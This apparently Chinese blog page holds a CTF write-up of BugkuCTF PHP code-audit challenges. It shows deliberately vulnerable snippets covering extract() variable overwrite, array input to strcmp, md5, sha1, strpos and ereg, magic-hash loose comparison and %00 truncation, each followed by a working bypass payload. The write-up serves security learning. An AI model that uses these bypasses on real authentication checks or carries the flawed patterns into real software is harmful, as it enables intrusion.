<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
      <script>
  var _hmt = _hmt || []
  ;(function() {
    var hm = document.createElement('script')
    hm.src = 'https://hm.baidu.com/hm.js?5a0acc897fd96474a2c8f4deac84611a'
    var s = document.getElementsByTagName('script')[0]
    s.parentNode.insertBefore(hm, s)
  })()
</script> 
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content>
    <meta name="description" content>
    
    <title>
      BUGKUCTF-代码审计 - pumpkin9
    </title>
    <link rel="manifest" href="/manifest.json">
    <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="/style/style.css">
  </head>
  <body>
    
    <div id="post-toc" class="animated hiddenToc hide">
      <span class="title">Toc</span>
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#extract变量覆盖"><span class="toc-text">extract变量覆盖</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#strcmp比较字符串"><span class="toc-text">strcmp比较字符串</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#urldecode二次编码绕过"><span class="toc-text">urldecode二次编码绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#md5-函数"><span class="toc-text">md5()函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数组返回NULL绕过"><span class="toc-text">数组返回NULL绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#弱类型整数大小比较绕过"><span class="toc-text">弱类型整数大小比较绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sha-函数比较绕过"><span class="toc-text">sha()函数比较绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#md5加密相等绕过"><span class="toc-text">md5加密相等绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#十六进制与数字比较"><span class="toc-text">十六进制与数字比较</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#变量覆盖"><span class="toc-text">变量覆盖</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x11-ereg正则-00截断"><span class="toc-text">0x11 - ereg正则%00截断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#strpos数组绕过"><span class="toc-text">strpos数组绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#数字验证正则绕过"><span class="toc-text">数字验证正则绕过</span></a></li></ol>
    </div>
    
    <div id="fixed-menu-wrap">
      <span class="iconfont icon-sousuo search-box menu-reset"></span>
      <span class="icon-toc menu-reset">Toc</span>
      <span class="iconfont icon-arrowup menu-reset"></span>
    </div>
    <div id="fixed-menu">
      <span class="iconfont icon-menu-"></span>
    </div>
    <div id="progress">
      <div class="line"></div>
    </div>
    <div id="search-shade" class="animated hiddenSearch hide">
      <div class="input-wrap">
        <span class="iconfont icon-sousuo search-box"></span>
        <input type="text" placeholder="Search">
        <span class="iconfont icon-close"></span>
      </div>
      <div class="search-result">
        <div class="meta">
          <span><b id="result-count">0</b> results found</span>
          <img src="/images/logo.jpeg">
        </div>
        <ul id="result-box"></ul>
      </div>
    </div>
    <div id="menu-mask" class="animated hideMenuMask hide">
      <span class="iconfont icon-close"></span>
      <div class="nav">
        
        <a href="/" class>
          Home
        </a>
        
        <a href="/archives" class>
          Archives
        </a>
        
        <a href="/categories" class>
          Categories
        </a>
        
        <a href="/tags" class>
          Tags
        </a>
        
        <a href="/friends" class>
          Friends
        </a>
        
        <a href="/about" class>
          About
        </a>
        
      </div>
    </div>
    <div id="header">
      <div class="intro">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <div class="author">pumpkin9</div>
      </div>
      <div class="nav">
        <span class="iconfont icon-menu menu-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
    </div>
    <div id="side" class="animated bounceInLeft">
      <div class="shrink">
        <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        <span class="iconfont icon-menu toggle-icon"></span>
        <a href="#" class="search-box">
          <span class="iconfont icon-sousuo"></span>
        </a>
      </div>
      <div class="magnify">
        <div class="about">
          <div class="author">pumpkin9</div>
          <a href="/" class="logo" style="background-image: url('/images/logo.jpeg')"></a>
        </div>

        <div class="nav">
          
          <a href="/" class>
            Home
          </a>
          
          <a href="/archives" class>
            Archives
          </a>
          
          <a href="/categories" class>
            Categories
          </a>
          
          <a href="/tags" class>
            Tags
          </a>
          
          <a href="/friends" class>
            Friends
          </a>
          
          <a href="/about" class>
            About
          </a>
          
          <a href="#" class="search-box">
            <span class="iconfont icon-sousuo"></span>
          </a>
        </div>
        <div class="bottom">
          <div class="follow">
             
            <a href="/atom.xml" target="_block">
              <span class="iconfont icon-rss"></span>
            </a>
            
          </div>
        </div>
      </div>
    </div>
    <div id="container">
      <div class="main animated bounceInRight delay-0.7s">
        <article class="post-entry">
    <div class="header">
      
      <div class="title">BUGKUCTF-代码审计</div>
      <div class="meta">
        <span class="item">
          <span class="iconfont icon-time-circle"></span>
          <span>2019/07/13</span>
        </span>

        
          <span class="item leancloud-visitors" id="/2019/07/13/BUGKUCTF-代码审计/" data-flag-title="BUGKUCTF-代码审计">
            <span class="iconfont icon-eye1"></span>
            <span class="leancloud-visitors-count"></span>
          </span>
        

         
        <span class="item">
          <span class="iconfont icon-folder"></span>
          <span>
              
                
                  <a href="/categories/CTF">CTF</a>
                
              
          </span>
        </span>
        
        
         
          <span class="item">
            <span class="iconfont icon-tag1"></span>
            <span>
                
                  
                    <a href="/tags/web">web</a>
                  
                
            </span>
          </span>
         
      </div>
      <div>
      </div>
    </div>
    <h3 id="extract变量覆盖">extract变量覆盖<a class="post-anchor" href="#extract变量覆盖"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$flag=<span class="hljs-string">'xxx'</span>;
extract($_GET);
<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($shiyan))
&#123;
$content=trim(file_get_contents($flag));
<span class="hljs-comment">#trim() 函数移除字符串两侧的空白字符或其他预定义字符。</span>
<span class="hljs-comment">#file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。</span>
<span class="hljs-keyword">if</span>($shiyan==$content)
&#123;
<span class="hljs-keyword">echo</span><span class="hljs-string">'flag&#123;xxx&#125;'</span>;
&#125;
<span class="hljs-keyword">else</span>
&#123;
<span class="hljs-keyword">echo</span><span class="hljs-string">'Oh.no'</span>;
&#125;
&#125;<span class="hljs-meta">?&gt;</span></code></pre>

<p>extract()函数, 将GET方式获得的变量导入到当前的符号表中<br>如果变量shiyan和变量content的值相同，<br>就输出flag的值<br>否则就输出Oh,no<br>因为extract()会把符号表中已存在的变量名的值替换掉，所以Payload ：<code>?shiyan=&amp;content=</code></p>
<p>那么在使用函数extract()的时候, 如何防止这种漏洞呢<br>可以在使用的时候加上参数EXTR_SKIP<br>这个参数表示如果有冲突，不覆盖已有的变量<br>或者还有EXTR_PREFIX_SAME - 如果有冲突，在变量名前加上前缀 prefix。</p>
<h3 id="strcmp比较字符串">strcmp比较字符串<a class="post-anchor" href="#strcmp比较字符串"></a></h3><p>源码</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$flag = <span class="hljs-string">"flag&#123;xxxxx&#125;"</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'a'</span>])) &#123;
<span class="hljs-keyword">if</span> (strcmp($_GET[<span class="hljs-string">'a'</span>], $flag) == <span class="hljs-number">0</span>)
 <span class="hljs-comment">//如果 str1 小于 str2 返回 &lt; 0； 如果 str1大于 str2返回 &gt; 0；如果两者相等，返回 0。</span>
<span class="hljs-comment">//比较两个字符串（区分大小写）</span>
<span class="hljs-keyword">die</span>(<span class="hljs-string">'Flag: '</span>.$flag);
<span class="hljs-keyword">else</span>
<span class="hljs-keyword">print</span> <span class="hljs-string">'No'</span>;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p>解这道题，就只要传入一个非字符串类型的变量即可，一般情况下，我们我们传数组，所以payload为：?a[]=123</p>
<h3 id="urldecode二次编码绕过">urldecode二次编码绕过<a class="post-anchor" href="#urldecode二次编码绕过"></a></h3><p>源码</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-keyword">if</span>(eregi(<span class="hljs-string">"hackerDJ"</span>,$_GET[id]))<span class="hljs-comment">//eregi()函数在一个字符串搜索指定的模式的字符串</span>
&#123;
<span class="hljs-keyword">echo</span>(<span class="hljs-string">"not allowed!"</span>);
<span class="hljs-keyword">exit</span>();
&#125;
$_GET[id] = urldecode($_GET[id]);
<span class="hljs-keyword">if</span>($_GET[id] == <span class="hljs-string">"hackerDJ"</span>)
&#123;
<span class="hljs-keyword">echo</span> <span class="hljs-string">"Access granted!"</span>;
<span class="hljs-keyword">echo</span> <span class="hljs-string">"flag"</span>;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p>就是需要构造get链接就可以得到答案：利用了两次urldecode第一次是浏览器的解码第二次是函数的解码</p>
<h3 id="md5-函数">md5()函数<a class="post-anchor" href="#md5-函数"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
error_reporting(<span class="hljs-number">0</span>);
$flag = <span class="hljs-string">'flag&#123;test&#125;'</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'username'</span>]) <span class="hljs-keyword">and</span> <span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'password'</span>])) &#123;
<span class="hljs-keyword">if</span> ($_GET[<span class="hljs-string">'username'</span>] == $_GET[<span class="hljs-string">'password'</span>])
<span class="hljs-keyword">print</span> <span class="hljs-string">'Your password can not be your username.'</span>;
<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (md5($_GET[<span class="hljs-string">'username'</span>]) === md5($_GET[<span class="hljs-string">'password'</span>]))
<span class="hljs-keyword">die</span>(<span class="hljs-string">'Flag: '</span>.$flag);
<span class="hljs-keyword">else</span>
<span class="hljs-keyword">print</span> <span class="hljs-string">'Invalid password'</span>;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<ul>
<li>松散比较：使用两个等号 == 比较，只比较值，不比较类型。</li>
<li>严格比较：用两个等号 === 比较，除了比较值，也比较类型。<br>md5()函数无法处理数组，如果传入的为数组，会返回NULL，所以两个数组经过加密后得到的都是NULL,也就是相等的。<br>payload= <code>http://123.206.87.240:9009/18.php?username[]=1&amp;password[]=0</code></li>
</ul>
<h3 id="数组返回NULL绕过">数组返回NULL绕过<a class="post-anchor" href="#数组返回NULL绕过"></a></h3><p>源码 <a href="http://123.206.87.240:9009/19.php" target="_blank" rel="noopener">题目地址</a></p>
<pre><code class="hljs php">
<span class="hljs-meta">&lt;?php</span>
$flag = <span class="hljs-string">"flag"</span>;

<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span> ($_GET[<span class="hljs-string">'password'</span>])) &#123;
<span class="hljs-keyword">if</span> (ereg (<span class="hljs-string">"^[a-zA-Z0-9]+$"</span>, $_GET[<span class="hljs-string">'password'</span>]) === <span class="hljs-keyword">FALSE</span>)
<span class="hljs-keyword">echo</span> <span class="hljs-string">'You password must be alphanumeric'</span>;
<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (strpos ($_GET[<span class="hljs-string">'password'</span>], <span class="hljs-string">'--'</span>) !== <span class="hljs-keyword">FALSE</span>)<span class="hljs-comment">//查找 "--" 在字符串中第一次出现的位置</span>
<span class="hljs-keyword">die</span>(<span class="hljs-string">'Flag: '</span> . $flag);
<span class="hljs-keyword">else</span>
<span class="hljs-keyword">echo</span> <span class="hljs-string">'Invalid password'</span>;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p>payload<code>http://123.206.87.240:9009/19.php?password[]=1223</code>自己都搞不懂为什么<br>先来谈论一下标准的答案：<br>第一个条件：</p>
<ul>
<li>必须以数字或者字母开头（其实看到ereg就可以想到%00截断）</li>
</ul>
<p>第二个条件：</p>
<ul>
<li>必须在password参数中找到–。</li>
</ul>
<p>所以得出以下正解：<br><code>index.php?password=a%00--</code><br>那么话又说回来了，为什么直接password[]=a就可以绕过呢？<br>1.ereg只能处理字符，而你是数组，所以返回的是null，三个等号的时候不会进行类型转换。所以null不等于false。<br>2.strpos的参数同样不能够是数组，所以返回的依旧是null，null不等于false也是正确。<br>所以可以拿到flag</p>
<h3 id="弱类型整数大小比较绕过">弱类型整数大小比较绕过<a class="post-anchor" href="#弱类型整数大小比较绕过"></a></h3><p><a href="[http://123.206.87.240:9009/22.php]" title="http://123.206.87.240:9009/22.php">传送门</a></p>
<pre><code class="hljs php">$temp = $_GET[<span class="hljs-string">'password'</span>];
is_numeric($temp)?<span class="hljs-keyword">die</span>(<span class="hljs-string">"no numeric"</span>):<span class="hljs-keyword">NULL</span>;
<span class="hljs-keyword">if</span>($temp&gt;<span class="hljs-number">1336</span>)&#123;
<span class="hljs-keyword">echo</span> $flag;</code></pre>

<ul>
<li>payload<code>http://123.206.87.240:9009/22.php?password=1444a</code>还是不知道为什么…</li>
<li>payload<code>http://123.206.87.240:9009/22.php?password[]=1</code><br>PHP数组有一个缺陷就是大多数的函数都没有办法去判断数组。</li>
<li>payload<code>http://120.24.86.145:9009/22.php?password=2345%20</code>或者<code>http://120.24.86.145:9009/22.php?password=2345%00</code><br>is_numeric()函数对于空字符%00，无论是%00放在前后都可以判断为非数值，而%20空格字符只能放在数值后。所以，查看函数发现该函数对于第一个空格字符会跳过空格字符判断，接着后面的判断。</li>
</ul>
<h3 id="sha-函数比较绕过">sha()函数比较绕过<a class="post-anchor" href="#sha-函数比较绕过"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$flag = <span class="hljs-string">"flag"</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'name'</span>]) <span class="hljs-keyword">and</span> <span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'password'</span>]))
&#123;
var_dump($_GET[<span class="hljs-string">'name'</span>]);
<span class="hljs-keyword">echo</span> <span class="hljs-string">""</span>;
var_dump($_GET[<span class="hljs-string">'password'</span>]);
var_dump(sha1($_GET[<span class="hljs-string">'name'</span>]));
var_dump(sha1($_GET[<span class="hljs-string">'password'</span>]));
<span class="hljs-keyword">if</span> ($_GET[<span class="hljs-string">'name'</span>] == $_GET[<span class="hljs-string">'password'</span>])
<span class="hljs-keyword">echo</span> <span class="hljs-string">'Your password can not be your name!'</span>;
<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (sha1($_GET[<span class="hljs-string">'name'</span>]) === sha1($_GET[<span class="hljs-string">'password'</span>]))
<span class="hljs-keyword">die</span>(<span class="hljs-string">'Flag: '</span>.$flag);
<span class="hljs-keyword">else</span>
<span class="hljs-keyword">echo</span> <span class="hljs-string">'Invalid password.'</span>;
&#125;
<span class="hljs-keyword">else</span>
<span class="hljs-keyword">echo</span> <span class="hljs-string">'Login first!'</span>;
<span class="hljs-meta">?&gt;</span></code></pre>

<ul>
<li>payload<code>http://123.206.87.240:9009/7.php?name[]=1&amp;password[]=0</code></li>
</ul>
<p>利用sha1函数不能处理数组进行构造payload<br>代码审计需要满足三个条件：</p>
<ol>
<li>if (isset(GET[′name′])andisset(_GET[‘password’])) ==》TRUE<ol start="2">
<li>if (GET[′name′]==_GET[‘password’]) ==》FALSE</li>
</ol>
</li>
<li>if sha1(GET[′name′])===sha1(_GET[‘password’])) ==》TRUE</li>
</ol>
<h3 id="md5加密相等绕过">md5加密相等绕过<a class="post-anchor" href="#md5加密相等绕过"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$md51 = md5(<span class="hljs-string">'QNKCDZO'</span>);
$a = @$_GET[<span class="hljs-string">'a'</span>];
$md52 = @md5($a);
<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($a))&#123;
<span class="hljs-keyword">if</span> ($a != <span class="hljs-string">'QNKCDZO'</span> &amp;&amp; $md51 == $md52) &#123;
<span class="hljs-keyword">echo</span> <span class="hljs-string">"flag&#123;*&#125;"</span>;
&#125; <span class="hljs-keyword">else</span> &#123;
<span class="hljs-keyword">echo</span> <span class="hljs-string">"false!!!"</span>;
&#125;&#125;
<span class="hljs-keyword">else</span>&#123;<span class="hljs-keyword">echo</span> <span class="hljs-string">"please input a"</span>;&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p>payload<code>http://123.206.87.240:9009/13.php?a=s878926199a</code>弱类型比较</p>
<h3 id="十六进制与数字比较">十六进制与数字比较<a class="post-anchor" href="#十六进制与数字比较"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
error_reporting(<span class="hljs-number">0</span>);
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">noother_says_correct</span><span class="hljs-params">($temp)</span>
</span>&#123;
$flag = <span class="hljs-string">'flag&#123;test&#125;'</span>;
$one = ord(<span class="hljs-string">'1'</span>); <span class="hljs-comment">//ord — 返回字符的 ASCII 码值</span>
$nine = ord(<span class="hljs-string">'9'</span>); <span class="hljs-comment">//ord — 返回字符的 ASCII 码值</span>
$number = <span class="hljs-string">'3735929054'</span>;
<span class="hljs-comment">// Check all the input characters!</span>
<span class="hljs-keyword">for</span> ($i = <span class="hljs-number">0</span>; $i &lt; strlen($number); $i++)
&#123;
<span class="hljs-comment">// Disallow all the digits!</span>
$digit = ord($temp&#123;$i&#125;);
<span class="hljs-keyword">if</span> ( ($digit &gt;= $one) &amp;&amp; ($digit &lt;= $nine) )
&#123;
<span class="hljs-comment">// Aha, digit not allowed!</span>
<span class="hljs-keyword">return</span> <span class="hljs-string">"flase"</span>;
&#125;
&#125;
<span class="hljs-keyword">if</span>($number == $temp)
<span class="hljs-keyword">return</span> $flag;
&#125;
$temp = $_GET[<span class="hljs-string">'password'</span>];
<span class="hljs-keyword">echo</span> noother_says_correct($temp);
<span class="hljs-meta">?&gt;</span></code></pre>

<p>定义了一个function <code>noother_says_correct</code><br>首先分析代码，函数要求变量$temp不能存在1-9之间的数字，<br>最后，又要求$temp=3735929054;<br>这本来是自相矛盾的，但php在转码时会把16进制转化为十进制.于是把<br>3735929054转换成16进制为0xdeadc0de，记得带上0x；<br>构造payload<br><code>password=0xdeadc0de</code></p>
<h3 id="变量覆盖">变量覆盖<a class="post-anchor" href="#变量覆盖"></a></h3><p>服务器被覆盖了..</p>
<h3 id="0x11-ereg正则-00截断">0x11 - ereg正则%00截断<a class="post-anchor" href="#0x11-ereg正则-00截断"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$flag = <span class="hljs-string">"xxx"</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span> ($_GET[<span class="hljs-string">'password'</span>]))
&#123;
<span class="hljs-keyword">if</span> (ereg (<span class="hljs-string">"^[a-zA-Z0-9]+$"</span>, $_GET[<span class="hljs-string">'password'</span>]) === <span class="hljs-keyword">FALSE</span>)
&#123;
<span class="hljs-keyword">echo</span> <span class="hljs-string">'You password must be alphanumeric'</span>;
&#125;
<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (strlen($_GET[<span class="hljs-string">'password'</span>]) &lt; <span class="hljs-number">8</span> &amp;&amp; $_GET[<span class="hljs-string">'password'</span>] &gt; <span class="hljs-number">9999999</span>)
&#123;
<span class="hljs-keyword">if</span> (strpos ($_GET[<span class="hljs-string">'password'</span>], <span class="hljs-string">'*-*'</span>) !== <span class="hljs-keyword">FALSE</span>) <span class="hljs-comment">//strpos — 查找字符串首次出现的位置</span>
&#123;
<span class="hljs-keyword">die</span>(<span class="hljs-string">'Flag: '</span> . $flag);
&#125;
<span class="hljs-keyword">else</span>
&#123;
<span class="hljs-keyword">echo</span>(<span class="hljs-string">'- have not been found'</span>);
&#125;
&#125;
<span class="hljs-keyword">else</span>
&#123;
<span class="hljs-keyword">echo</span> <span class="hljs-string">'Invalid password'</span>;
&#125;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<ol>
<li>if (ereg (“^[a-zA-Z0-9]+”,_GET[‘password’]) === FALSE)  ==》 FLASE</li>
<li>if (strlen(_GET[‘password’]) &lt; 8 &amp;&amp;_GET[‘password’] &gt; 9999999)    //正常感觉矛盾，但是可以利用科学计数法绕过1e8 &gt; 9999999</li>
<li>if (strpos ($_GET[‘password’], ‘<em>-</em>‘) !== FALSE)   //password的值应包含字符串’<em>-</em>‘<br>构造payload：<blockquote>
<p><code>http://123.206.87.240:9009/5.php?password=1e8%00*-*
http://123.206.87.240:9009/5.php?password[]=</code></p>
</blockquote>
</li>
</ol>
<h3 id="strpos数组绕过">strpos数组绕过<a class="post-anchor" href="#strpos数组绕过"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$flag = <span class="hljs-string">"flag"</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span> ($_GET[<span class="hljs-string">'ctf'</span>])) &#123;
<span class="hljs-keyword">if</span> (@ereg (<span class="hljs-string">"^[1-9]+$"</span>, $_GET[<span class="hljs-string">'ctf'</span>]) === <span class="hljs-keyword">FALSE</span>)
<span class="hljs-keyword">echo</span> <span class="hljs-string">'必须输入数字才行'</span>;
<span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (strpos ($_GET[<span class="hljs-string">'ctf'</span>], <span class="hljs-string">'#biubiubiu'</span>) !== <span class="hljs-keyword">FALSE</span>)
<span class="hljs-keyword">die</span>(<span class="hljs-string">'Flag: '</span>.$flag);
<span class="hljs-keyword">else</span>
<span class="hljs-keyword">echo</span> <span class="hljs-string">'骚年，继续努力吧啊~'</span>;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p>payload<code>http://123.206.87.240:9009/15.php?ctf[]=</code></p>
<h3 id="数字验证正则绕过">数字验证正则绕过<a class="post-anchor" href="#数字验证正则绕过"></a></h3><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
error_reporting(<span class="hljs-number">0</span>);
$flag = <span class="hljs-string">'flag&#123;test&#125;'</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-string">"POST"</span> == $_SERVER[<span class="hljs-string">'REQUEST_METHOD'</span>])
&#123;
$password = $_POST[<span class="hljs-string">'password'</span>];
<span class="hljs-keyword">if</span> (<span class="hljs-number">0</span> &gt;= preg_match(<span class="hljs-string">'/^[[:graph:]]&#123;12,&#125;$/'</span>, $password)) <span class="hljs-comment">//preg_match — 执行一个正则表达式匹配</span>
&#123;
<span class="hljs-keyword">echo</span> <span class="hljs-string">'flag'</span>;
<span class="hljs-keyword">exit</span>;
&#125;
<span class="hljs-keyword">while</span> (<span class="hljs-keyword">TRUE</span>)
&#123;
$reg = <span class="hljs-string">'/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'</span>;
<span class="hljs-keyword">if</span> (<span class="hljs-number">6</span> &gt; preg_match_all($reg, $password, $arr))
<span class="hljs-keyword">break</span>;
$c = <span class="hljs-number">0</span>;
$ps = <span class="hljs-keyword">array</span>(<span class="hljs-string">'punct'</span>, <span class="hljs-string">'digit'</span>, <span class="hljs-string">'upper'</span>, <span class="hljs-string">'lower'</span>); <span class="hljs-comment">//[[:punct:]] 任何标点符号 [[:digit:]] 任何数字 [[:upper:]] 任何大写字母 [[:lower:]] 任何小写字母</span>
<span class="hljs-keyword">foreach</span> ($ps <span class="hljs-keyword">as</span> $pt)
&#123;
<span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">"/[[:$pt:]]+/"</span>, $password))
$c += <span class="hljs-number">1</span>;
&#125;
<span class="hljs-keyword">if</span> ($c &lt; <span class="hljs-number">3</span>) <span class="hljs-keyword">break</span>;
<span class="hljs-comment">//&gt;=3，必须包含四种类型三种与三种以上</span>
<span class="hljs-keyword">if</span> (<span class="hljs-string">"42"</span> == $password) <span class="hljs-keyword">echo</span> $flag;
<span class="hljs-keyword">else</span> <span class="hljs-keyword">echo</span> <span class="hljs-string">'Wrong password'</span>;
<span class="hljs-keyword">exit</span>;
&#125;
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>

<p>利用preg_match()函数不能处理数组进行构造payload<br>payload<code>post : password[]=</code></p>


  
    <div class="post-reward">
    <div id="reward-button">打赏</div>
      <div id="qr">
        <div class="wrap">
            
            <div class="bg-wrap">
              <a href="/images/zhifubao.png" target="_block" class="bg" style="background-image:url('/images/zhifubao.png')"></a>
              支付宝
            </div>
            
            
            <div class="bg-wrap">
                <a href="/images/weixin.png" target="_block" class="bg" style="background-image:url('/images/weixin.png')"></a>
              微信
            </div>
            
        </div>
      </div>
    </div>
  
  <div class="post-guide">
    <div class="item left">
        
          <a href="/2019/07/17/2019强网杯-copperstudy/">2019强网杯-copperstudy</a>
        
    </div>
    <div class="item right">
        
          <a href="/2019/04/10/2019掘安杯-write-up/">2019掘安杯-write up</a>
        
    </div>
  </div>

  

  <div class="post-copyright">
    <div class="auth">
      本文作者：<a href="http://pumpkin9.github.io">pumpkin9</a>
    </div>
    <div class="link">
      永久链接：<a href="http://pumpkin9.github.io/2019/07/13/BUGKUCTF-代码审计/">http://pumpkin9.github.io/2019/07/13/BUGKUCTF-代码审计/</a>
    </div>
    <div class="declare">
      版权声明：本文首发于<a href="http://pumpkin9.github.io">pumpkin9</a>的博客，转载请注明出处！
    </div>
  </div>

  <div id="comment"></div>

  
  
</article>
        <footer>
          <div class="copyright">
            ©2020
            <a href="http://pumpkin9.github.io">pumpkin9</a> Powered by <a href="https://hexo.io">Hexo</a> |
            <a href="https://github.com/shixiaohu2206/hexo-theme-huhu">hexo-theme-huhu</a>
          </div>
          
        </footer>
      </div>
    </div>
  <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":70,"vOffset":-20},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false});</script></body>
  
</html>
<script type="text/javascript">
                  window.HUHU_CONFIG = JSON.parse("{\"share\":[\"weibo\",\"weixin\",\"qqkongjian\",\"QQ\",\"douban\",\"facebook\",\"twitter\",\"google\"],\"valine\":{\"API_ID\":\"vVaPNFdcK9dSGbIzRRK8Lynz-gzGzoHsz\",\"API_KEY\":\"dPlqFhVLg4CTqpRKmq7I0cQw\"},\"service_worker\":{\"open\":false}}")
                </script> <script type="text/javascript">window.addEventListener('load', function() {
    
    window.loadJs = function(d, m, a) {
      var c = document.getElementsByTagName('head')[0] || document.head || document.documentElement
      var b = document.createElement('script')
      b.defer = true
      b.setAttribute('type', 'text/javascript')
      b.setAttribute('charset', 'UTF-8')
      b.setAttribute('async', 'true')
      b.setAttribute('src', d)
      m && b.setAttribute('data-main', '/scripts/app-built')
      if (typeof a === 'function') {
        if (window.attachEvent) {
          b.onreadystatechange = function() {
            var e = b.readyState
            if (e === 'loaded' || e === 'complete') {
              b.onreadystatechange = null
              a()
            }
          }
        } else {
          b.onload = a
        }
      }
      c.appendChild(b)
    }
    window.loadJs && window.loadJs('https://cdn.bootcss.com/require.js/2.3.6/require.min.js', true, function() {require.config({"paths":{"util":"util","share":"share","search":"search","registerSW":"registerSW","valine":"cdn/Valine.min","av":["https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min"],"pjax":["https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min"],"jquery":["https://cdn.bootcss.com/jquery/3.4.1/jquery.min"],"confirm":["https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min"],"fancybox":["https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min"],"chart":["https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.bundle.min"]},"map":{"*":{"css":"https://cdn.bootcss.com/require-css/0.1.10/css.min.js"}},"shim":{"fancybox":{"deps":["css!https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css"]},"confirm":{"deps":["css!https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min.css"]},"chart":{"deps":["css!https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.min.css"]}},"waitSeconds":3})})
  })</script> <script type="text/javascript">
                  ;(function() {
                    var bp = document.createElement('script')
                    var curProtocol = window.location.protocol.split(':')[0]
                    if (curProtocol === 'https') {
                      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'
                    } else {
                      bp.src = 'http://push.zhanzhang.baidu.com/push.js'
                    }
                    var s = document.getElementsByTagName('script')[0]
                    s.parentNode.insertBefore(bp, s)
                  })()
                </script> 
